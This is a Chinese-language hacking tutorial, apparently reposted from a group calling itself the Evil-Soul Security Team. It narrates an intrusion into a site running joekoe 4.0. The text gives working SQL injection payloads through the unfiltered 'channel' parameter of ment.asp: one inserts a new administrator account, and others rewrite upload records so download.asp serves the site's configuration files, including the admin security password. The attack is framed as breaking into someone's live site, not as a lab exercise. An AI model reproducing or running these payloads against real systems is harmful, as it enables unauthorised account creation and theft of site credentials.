安全检测防线网站安全电脑资料
作者:ヅ深蓝ぺT透
:噩靈戰隊[Evil-Soul Security Team]
大家好, 我是ヅ深蓝ぺT透,
漏洞说明
乔客(joekoe) 4.0 sql 未公布漏洞 一步曲.
入侵我们要找它的网站的漏洞点。 我们随便打开个页面< [首发漏洞]迅雷0day>.看到它的URL连接是HTML的,静态页面不能利用。我们再找。 看到了 (查看所有评论)
.hacker../mon/ment.asp?channel=down&dataid=14789
到达这个连接.. 注入大家看多了,我们来在后面加个'
.hacker../mon/ment.asp?channel=down&dataid=14789' (图一)
看到没,没有报错~ channel=down 这个DOWN引起我的怀疑它是做什么用的
我们在他后面加个' 看到没.报错了 (图二)
我们再and 1=1(图三)
and 1=2(图四)
都没有报错,郁闷。。难道没有漏洞?不对 刚才报错的那句错误信息:
select count(*) from db_sys_review where nsort='down'' and iid=14789 and r_hidden=1
引起我的注意,'并没有过滤 channel字段没有任何过滤就放入了数据库。而且原始错误:
Error #-2147217900, 字符串 'down' and iid=14789 and r_hidden=1' 之前有未闭合的引号。 Microsoft OLE DB Provider for SQL Server
既然是SQL版本的那给我们很多便利,我们本机架设个. 提交
';insert into db_sys_manager (m_user,m_password,m_grade,m_hidden) values('czp','526a568e057b69f9',10,0);--
它的语句就会变成
select count(*) from db_sys_review where nsort='down';insert into db_sys_manager (m_user,m_password,m_grade,m_hidden)
values('czp','526a568e057b69f9',10,0);-- and iid=14789 and r_hidden=1
(图五)
看到了没 数据库中给我加入了一个用户名为czp 密码为526a568e057b69f9的员帐号。
高兴~我们打开它的后台。 安全密码:。。这是什么东西。。 我们查看本机源代码.
mon\\config\\manage\\configure.asp 记录安全密码。哎 已经凌晨三点了 先休息下了。 二步曲.
继续昨天我们的入侵。既然我们进不了后台。那么多我们加管理号已经无任何意义了。(但是可以改我们会员权限。呵呵加个VIP帐号)继续寻找别的漏洞。 前几天乔客暴了个上传漏洞。可是试了试并没有成功。我再论坛随便发了个帖子,上传了个软件。发现他的下载连接是.hacker../mon/download.asp?module=upload&id=849
849代表我上传文件的ID号。 那我ID号在那记录那。很显然在数据库里。
本机测试 u_id是对应提交的ID号码 。u_urL对应的是文件路径。默认在upload中,我们将id=1的u_url改成../mon/config/manage/configure.asp
再提交 127.0.0.1/mon/download.asp?module=upload&id=1
看(图七)
成功把本机的mon/config/manage/configure.asp配置文件下载下来,兴奋。。。
.hacker../mon/ment.asp?channel=down';UPDATE db_sys_upload SET
u_filename='mon/config/manage/configure.asp' WHERE u_id='850';-- 再提交
.hacker../mon/download.asp?module=upload&id=850
.hacker../mon/ment.asp?channel=down';UPDATE
db_sys_upload SET u_filename='mon/config/configure.asp' WHERE u_id='851';-- 再提交
.hacker../mon/download.asp?module=upload&id=851
2024年安全检测防线网站安全电脑资料
